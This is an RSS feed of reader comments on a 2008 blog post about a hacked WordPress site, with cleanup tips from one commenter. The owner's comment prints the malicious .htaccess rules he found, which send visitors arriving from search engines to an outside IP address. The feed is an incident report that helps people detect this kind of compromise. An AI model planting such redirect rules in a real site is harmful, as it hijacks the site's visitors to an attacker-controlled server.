<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comments on: Gaslighted by Google.</title>
	<atom:link href="http://www.blyberg.net/2008/11/17/gaslighted-by-google/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.blyberg.net/2008/11/17/gaslighted-by-google/</link>
	<description>A library-geek blog</description>
	<lastBuildDate>Tue, 16 Mar 2010 15:34:50 -0400</lastBuildDate>
	<generator>http://wordpress.org/?v=abc</generator>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
		<item>
		<title>By: Cloned Milkmen</title>
		<link>http://www.blyberg.net/2008/11/17/gaslighted-by-google/comment-page-1/#comment-533501</link>
		<dc:creator>Cloned Milkmen</dc:creator>
		<pubDate>Wed, 26 Nov 2008 00:03:34 +0000</pubDate>
		<guid isPermaLink="false">http://www.blyberg.net/?p=230#comment-533501</guid>
		<description>You should also check your Wordpress database entries.  You might find that there are some &quot;hidden&quot; plugins activated and that there are additional admin accounts installed.

When you reinstalled wordpress did you delete your old wp-content?  If not you need to make sure your themes were not infected.  Check the first few lines of all the PHP files to see if there is any code checking for cryptic looking COOKIE names.

Also search your wp-content directory for image files with names that end in an extra letter: e.g. giff or jpgg or pngg.</description>
		<content:encoded><![CDATA[<p>You should also check your Wordpress database entries.  You might find that there are some &#8220;hidden&#8221; plugins activated and that there are additional admin accounts installed.</p>
<p>When you reinstalled wordpress did you delete your old wp-content?  If not you need to make sure your themes were not infected.  Check the first few lines of all the PHP files to see if there is any code checking for cryptic looking COOKIE names.</p>
<p>Also search your wp-content directory for image files with names that end in an extra letter: e.g. giff or jpgg or pngg.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: ditto</title>
		<link>http://www.blyberg.net/2008/11/17/gaslighted-by-google/comment-page-1/#comment-531415</link>
		<dc:creator>ditto</dc:creator>
		<pubDate>Thu, 20 Nov 2008 00:55:36 +0000</pubDate>
		<guid isPermaLink="false">http://www.blyberg.net/?p=230#comment-531415</guid>
		<description>Ha,
I just had the same thing!

mine was hosted with Blue Host</description>
		<content:encoded><![CDATA[<p>Ha,<br />
I just had the same thing!</p>
<p>mine was hosted with Blue Host</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: john</title>
		<link>http://www.blyberg.net/2008/11/17/gaslighted-by-google/comment-page-1/#comment-530849</link>
		<dc:creator>john</dc:creator>
		<pubDate>Tue, 18 Nov 2008 19:56:46 +0000</pubDate>
		<guid isPermaLink="false">http://www.blyberg.net/?p=230#comment-530849</guid>
		<description>I wouldn&#039;t want to &lt;a href=&quot;http://www.ixwebhosting.com/&quot; rel=&quot;nofollow&quot;&gt;name any names&lt;/a&gt;...</description>
		<content:encoded><![CDATA[<p>I wouldn&#8217;t want to <a href="http://www.ixwebhosting.com/" rel="nofollow">name any names</a>&#8230;</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Paul R Pival</title>
		<link>http://www.blyberg.net/2008/11/17/gaslighted-by-google/comment-page-1/#comment-530488</link>
		<dc:creator>Paul R Pival</dc:creator>
		<pubDate>Tue, 18 Nov 2008 03:12:14 +0000</pubDate>
		<guid isPermaLink="false">http://www.blyberg.net/?p=230#comment-530488</guid>
		<description>Can you name or hint at the hosting company please?  :-)</description>
		<content:encoded><![CDATA[<p>Can you name or hint at the hosting company please?  :-)</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: john</title>
		<link>http://www.blyberg.net/2008/11/17/gaslighted-by-google/comment-page-1/#comment-530318</link>
		<dc:creator>john</dc:creator>
		<pubDate>Mon, 17 Nov 2008 21:55:03 +0000</pubDate>
		<guid isPermaLink="false">http://www.blyberg.net/?p=230#comment-530318</guid>
		<description>Solved!

Thanks to some suggestions from Scot Colford and Mike Cunningham, I checked the .htaccess file in my Wordpress directory, and here is what I found:

&lt;code&gt;RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.202/in.html?s=ix [R,L]
&lt;/code&gt;

I suppose that&#039;s a lesson in &quot;you get what you pay for&quot; when it comes to web hosting.  I pulled blyberg.net off that company&#039;s servers on Friday and it&#039;s now hosted a little closer to home on our very own Darien Library community sites server.

*sheesh* (Oh, and sorry Google, keep dominating, buddy!)</description>
		<content:encoded><![CDATA[<p>Solved!</p>
<p>Thanks to some suggestions from Scot Colford and Mike Cunningham, I checked the .htaccess file in my Wordpress directory, and here is what I found:</p>
<p><code>RewriteEngine On<br />
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]<br />
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]<br />
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]<br />
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]<br />
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]<br />
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]<br />
RewriteRule .* <a href="http://89.28.13.202/in.html?s=ix" rel="nofollow">http://89.28.13.202/in.html?s=ix</a> [R,L]<br />
</code></p>
<p>I suppose that&#8217;s a lesson in &#8220;you get what you pay for&#8221; when it comes to web hosting.  I pulled blyberg.net off that company&#8217;s servers on Friday and it&#8217;s now hosted a little closer to home on our very own Darien Library community sites server.</p>
<p>*sheesh* (Oh, and sorry Google, keep dominating, buddy!)</p>
]]></content:encoded>
	</item>
</channel>
</rss>
